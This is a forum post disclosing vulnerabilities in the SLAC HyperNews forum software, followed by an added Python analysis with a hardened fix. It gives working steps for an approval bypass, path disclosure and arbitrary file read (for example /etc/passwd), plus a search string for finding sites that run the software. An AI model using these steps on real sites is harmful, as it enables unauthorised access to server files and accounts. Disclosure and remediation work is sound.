Vulnerability in SLAC HyperNews

Discussion in 'Web vulnerabilities' started by dannote, 19 Jun 2012.

  1. dannote

    dannote, New Member (joined 17 Jun 2012)

    CMS site: http://hypernews.slac.stanford.edu/hn/download/

    Sites running SLAC HyperNews:

    https://www.google.ru/search?q="This+site+runs+SLAC+HyperNews"

    1. Registration confirmation on pre-moderated forums:

    http://[confirmation link]&AdminID=1&Approved=yes

    validate-email.pl line 34-35:
    Code:
        # both values are taken directly from the request parameters
        my $adminid = $in{'AdminID'};
        my $approved = $in{'Approved'};

    validate-email.pl line 240-249:
    Code:
        if ($moderateMembership == 1 && $adminid ne "" && $approved eq "yes" ) {
            print "<BR> The approval email has been sent to the user. Thanks!" if $Email;
            print "<BR> The account has been activated. User $userid does not have an email address. Please inform $userid that his or her account is ready. " if !$Email;
        } else {
            print "\nCongratulations!  Your account '$userid' has been approved and activated. An email will be sent to you for the record.";
            print qq {
                <pre>
                $ins
            };
        }

    
    2. Path disclosure:

    2.1 $hndocs

    http://[SLAC HyperNews URL]/get/AUX/1

    get line 209-221:
    Code:
        my $base_dir;
        if ($URL =~ /^\/AUX\/.*/) {
            &HNMsg("[get-11] (get) attachment: $hndocs$base_dir\n") if $debug;
            $base_dir = $URL;
        } else {
            &HNMsg("[get-12] (get) base urc file: $hndocs$base_dir.html,urc\n") if $debug;
            $base_dir = url2forum($URL);
        }

        #___________________________________________________________________
        # One global to hold the forum that the message is in.

        $the_forum = HN::Message->get($base_dir);
    
    2.2 $hnPeople

    See 3.

    3. Arbitrary file read.

    http://[SLAC HyperNews URL]/preview-response.pl => POST request with the parameters contentType=URL and body=file://[file]

    preview-response.pl line 160-171:
    Code:
        if ($contentType eq 'URL' && $body =~ /^file:/) {
          &HNMsg("[pvres-7] (PreviewResponsePL) Open URL file  ") if $debug;
          $contentType = "Plain Text";
          ($body) = split("\n",$body);
          $body =~ s/[ \t\n]+//g;
          # everything after the 5-character "file:" prefix is passed to open() as-is
          if (open(EXTFILE,"<".substr($body,5))) {
            $body = join('',<EXTFILE>);
            close(EXTFILE);
          } else {
            &HNError("Cannot open file URL $body\n");
          }
        }  # end of babar
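The snippet from preview-response.pl quoted in point 3 is worth modelling step by step, because the whitespace stripping means the attacker's path does not even need to be contiguous. The block below is an added example, not part of the original post and not HyperNews code: it re-implements the path extraction in Python from the posted Perl, then shows one hardened variant that confines `file:` bodies to an attachment directory (`ATTACHMENT_ROOT` is an assumed name; HyperNews has no such setting on this page). The simpler fix, dropping `file:` support entirely, is also noted in the code.

```python
import os
import re
from typing import Optional


def hypernews_body_to_path(body: str, content_type: str = "URL") -> Optional[str]:
    """Model (constructed from the posted snippet) of what preview-response.pl opens.

    The Perl branch fires when contentType is 'URL' and body starts with 'file:'.
    It keeps only the first line, strips every space, tab and newline anywhere in it,
    then drops the first five characters ('file:'). The remainder goes to open()
    unchanged, so 'file:///etc/passwd' and 'file: /etc/ passwd' both open /etc/passwd.
    Returns None when the branch would not run.
    """
    if content_type != "URL" or not body.startswith("file:"):
        return None
    first_line = body.split("\n", 1)[0]
    first_line = re.sub(r"[ \t\n]+", "", first_line)
    return first_line[5:]


# Assumed attachment directory for the hardened variant; not a HyperNews setting.
ATTACHMENT_ROOT = "/var/hypernews/attachments"


def safe_body_to_path(body: str, content_type: str = "URL",
                      root: str = ATTACHMENT_ROOT) -> Optional[str]:
    """Hardened variant (assumed design, not HyperNews code).

    Re-interprets whatever follows 'file:' as a path *relative* to `root`, normalises
    it, and refuses anything that does not stay inside `root`. Absolute paths such as
    '///etc/passwd' are rebased under root rather than honoured; '..' segments that
    would climb out are rejected. Note that a pure string check cannot see symlinks:
    a real fix should also resolve the opened file (realpath/fstat) or, simpler still,
    remove the 'file:' branch altogether, since a web form has no business reading
    server-local files on behalf of the client.
    """
    raw = hypernews_body_to_path(body, content_type)
    if raw is None:
        return None
    rel = raw.lstrip("/")
    if not rel:
        return None  # 'file:' or 'file:///' alone would name the root directory itself
    root = os.path.normpath(root)
    candidate = os.path.normpath(os.path.join(root, rel))
    if os.path.commonpath([root, candidate]) != root:
        return None  # escaped the tree via '..' components
    return candidate


if __name__ == "__main__":
    for sample in ("file:///etc/passwd", "file: /etc/ passwd\nsecond line ignored",
                   "file:../../../etc/passwd", "file:2012/report.txt"):
        print(repr(sample), "->", hypernews_body_to_path(sample), "| hardened:",
              safe_body_to_path(sample))
```

Running the block prints, for each constructed sample body, the path the original code would pass to `open()` next to what the hardened check allows; the second sample shows that spaces inside the path are silently removed before the file is opened, which matters when a WAF or log search is looking for the literal string `/etc/passwd`.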